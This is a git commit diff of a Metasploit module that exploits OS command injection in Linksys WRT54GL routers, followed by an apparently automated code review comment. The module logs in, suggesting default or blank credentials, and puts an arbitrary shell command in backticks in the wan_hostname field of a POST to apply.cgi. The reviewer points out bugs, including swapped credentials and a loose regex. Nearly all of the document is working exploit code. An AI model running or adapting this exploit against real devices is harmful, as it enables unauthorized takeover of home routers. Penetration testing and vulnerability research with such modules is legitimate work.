hopefully all fixes included

bug/bundler_fix
m-1-k-3 2013-01-23 12:15:34 +01:00
parent 11c13500be
commit 3a5e92ba6f
1 changed files with 80 additions and 33 deletions


@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Linksys WRT54GL Remote Command Execution',
'Description' => %q{
Some Linksys Routers are vulnerable to OS Command injection.
You will need credentials to the webinterface to access the vulnerable part
You will need credentials to the web interface to access the vulnerable part
of the application.
Default credentials are always a good starting point. admin/admin or admin
and blank password could be a first try.
@ -34,8 +34,10 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
[ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
[ 'EDB', '24202' ],
[ 'BID', '57459' ],
[ 'OSVDB', '89421' ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 18 2013'))
@ -43,12 +45,12 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(80),
OptString.new('VULNPATH',[ true, 'PATH to OS Command Injection', '/apply.cgi']),
OptString.new('USER',[ true, 'User to login with', 'admin']),
OptString.new('PASS',[ true, 'Password to login with', 'password']),
OptString.new('TARGETURI',[ true, 'PATH to OS Command Injection', '/apply.cgi']),
OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
OptString.new('PASSWORD',[ true, 'Password to login with', 'password']),
OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']),
OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']),
OptString.new('LANIP', [ false, 'LAN IP address of the router', '<RHOST>']),
OptAddress.new('LANIP', [ false, 'LAN IP address of the router - CHANGE THIS', '1.1.1.1']),
OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']),
OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']),
OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']),
@ -56,46 +58,41 @@ class Metasploit3 < Msf::Auxiliary
end
def run
#setting up the needed variables
uri = datastore['VULNPATH']
user = datastore['USER']
#setting up some basic variables
uri = datastore['TARGETURI']
user = datastore['USERNAME']
rhost = datastore['RHOST']
netmask = datastore['NETMASK']
routername = datastore['ROUTER_NAME']
wandomain = datastore['WAN_DOMAIN']
wanmtu = datastore['WAN_MTU']
# using the RHOST for the correct lan IP settings
# WARNING: Attacks via the WAN IP are breaking the LAN configuration of the device!
if datastore['LANIP'] !~ /<RHOST>/
if datastore['LANIP'] !~ /1.1.1.1/
#there is a configuration from the user so we use LANIP for the router configuration
ip = datastore['LANIP'].split('.')
else
#no configuration from user so we use RHOST for the router configuration
ip = rhost.split('.')
end
# not sure if this is a good way for blank passwords:
if datastore['PASS'] == "<BLANK>"
if datastore['PASSWORD'] == "<BLANK>"
pass = ""
else
pass = datastore['PASS']
pass = datastore['PASSWORD']
end
print_status("Trying to login with #{user} / #{pass}")
user_pass = Rex::Text.encode_base64(user + ":" + pass)
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' =>
{
'Authorization' => "Basic #{user_pass}",
}
}, 25)
'basic_auth' => "#{user}:#{pass}"
})
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("#{target_url} not responding")
vprint_error("#{rhost} not responding")
end
return :abort if (res.code == 404)
@ -108,16 +105,17 @@ class Metasploit3 < Msf::Auxiliary
end
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
vprint_error("#{rhost} - Failed to connect to the web server")
return :abort
end
print_status("Sending remote command: " + datastore['CMD'])
cmd = Rex::Text.uri_encode(datastore['CMD'])
#cmd = datastore['CMD']
# cmd = Rex::Text.uri_encode(datastore['CMD'])
cmd = datastore['CMD']
data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1"
#original Post Request:
# data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1"
if datastore['VERBOSE'] == true
print_line("using the following target URL: \n#{uri}")
@ -128,17 +126,66 @@ class Metasploit3 < Msf::Auxiliary
{
'uri' => uri,
'method' => 'POST',
'headers' =>
{
'Authorization' => "Basic #{user_pass}",
},
'data' => data_cmd,
}, 20)
'basic_auth' => "#{pass}:#{pass}",
#'data' => data_cmd,
'vars_post' =>
{
'submit_button' => "index",
'change_action' => "1",
'submit_type' => "1",
'action' => "Apply",
'now_proto' => "dhcp",
'daylight_time' => "1",
'lan_ipaddr' => "4",
'wait_time' => "0",
'need_reboot' => "0",
'ui_language' => "de",
'wan_proto' => "dhcp",
'router_name' => "#{routername}",
'wan_hostname' => "`#{cmd}`",
'wan_domain' => "#{wandomain}",
'mtu_enable' => "1",
'wan_mtu' => "#{wanmtu}",
'lan_ipaddr_0' => "#{ip[0]}",
'lan_ipaddr_1' => "#{ip[1]}",
'lan_ipaddr_2' => "#{ip[2]}",
'lan_ipaddr_3' => "#{ip[3]}",
'lan_netmask' => "#{netmask}",
'lan_proto' => "dhcp",
'dhcp_check' => "1",
'dhcp_start' => "100",
'dhcp_num' => "50",
'dhcp_lease' => "0",
'wan_dns' => "4",
'wan_dns0_0' => "0",
'wan_dns0_1' => "0",
'wan_dns0_2' => "0",
'wan_dns0_3' => "0",
'wan_dns1_0' => "0",
'wan_dns1_1' => "0",
'wan_dns1_2' => "0",
'wan_dns1_3' => "0",
'wan_dns2_0' => "0",
'wan_dns2_1' => "0",
'wan_dns2_2' => "0",
'wan_dns2_3' => "0",
'wan_wins' => "4",
'wan_wins_0' => "0",
'wan_wins_1' => "0",
'wan_wins_2' => "0",
'wan_wins_3' => "0",
'time_zone' => "-08+1+1",
'_daylight_time' => '1'
},
})
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
vprint_error("#{rhost} - Failed to connect to the web server")
return :abort
end
print_status("Blind Exploitation - wait 5 seconds until the configuration gets applied\n")
print_line("")
print_status("Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed")
print_status("Blind Exploitation - unknown Exploitation state\n")
end
end
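Review bot: The POST in the last hunk authenticates with `'basic_auth' => "#{pass}:#{pass}"`, which puts the password in the username position, so the command request uses different credentials than the login check above it (`"#{user}:#{pass}"`); it should read `'basic_auth' => "#{user}:#{pass}"`. In the `def run` hunk, the sentinel test `datastore['LANIP'] !~ /1.1.1.1/` uses unescaped dots, so any value whose digits happen to line up (e.g. 1x1y1z1) is also treated as "unset"; a plain comparison `if datastore['LANIP'] != '1.1.1.1'` states the intent exactly. That same hunk still falls through after `vprint_error("#{rhost} not responding")` and then dereferences `res.code` on a nil response, so the `unless` branch presumably needs a `return :abort` (the enclosing `run` method ends outside that hunk). The duplicated `data_cmd` string is now dead since the request uses `vars_post`; consider dropping it and the commented-out original rather than keeping both.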